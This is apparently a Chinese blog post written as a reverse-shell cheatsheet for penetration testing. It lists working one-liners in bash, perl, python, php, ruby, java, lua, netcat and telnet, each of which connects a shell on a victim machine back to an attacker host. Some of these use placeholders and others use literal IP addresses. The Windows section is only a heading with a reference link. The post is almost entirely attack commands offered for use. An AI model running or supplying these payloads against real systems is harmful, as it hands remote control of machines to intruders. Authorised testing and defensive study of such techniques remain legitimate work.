how get a reverse shell

简介
渗透测试过程中, 经常遇到WEB获取反弹shell、数据库获取反弹shell等场景, 本文记录诸位大佬们研究的反弹shell的技巧, 作为一个cheatsheet.

状态: 持续总结中

文章目录

  • linux下创建反弹shell
  • Windows下创建反弹shell

linux下反弹shell

1.上传反弹文件(脚本、木马)

2.bash

1
$ /bin/bash -i >& /dev/tcp/<Attackip>/<Attackport> 0>&1

该命令在渗透测试中占据榜首多年, 是反弹 shell的首选命令, 但是在一些系统中无法成功运行, 目前在centos下实测过可正常反弹shell.

3.perl

1
$ perl -e 'use Socket;$i="<Attackip>";$p=<Attackport>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl是linux系统中内置的解释器, 当bash命令无法反弹shell时, 优先选择该命令

4.python

1
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attackip>",<Attackport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

5.php

1
$ php -r '$sock=fsockopen("<Attackip>",<Attackport>);exec("/bin/sh -i <&3 >&3 2>&3");'

6.ruby

1
$ ruby -rsocket -e'f=TCPSocket.open("<Attackip>",<Attackport>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

7.java

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

8.Lua:

1
lua -e "require('socket');require('os');t=socket.tcp();t:connect('<Attackip>','<Attackport>');os.execute('/bin/sh -i <&3 >&3 2>&3');"

9.nc:

1
2
3
nc -e /bin/sh <Attackip> <Attackport>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Attackip> <Attackport> >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

10.nc
1) 使用-e参数

1
2


2) 不使用-e参数

1
2
3
4
5
# Victim
mknod /tmp/backpipe p

# Victim
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe

11.telnet

1
2
mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/bash 1>backpipe
telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888

reverse shell on windows

参考文章

powershell反弹shell常见方式总结

owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%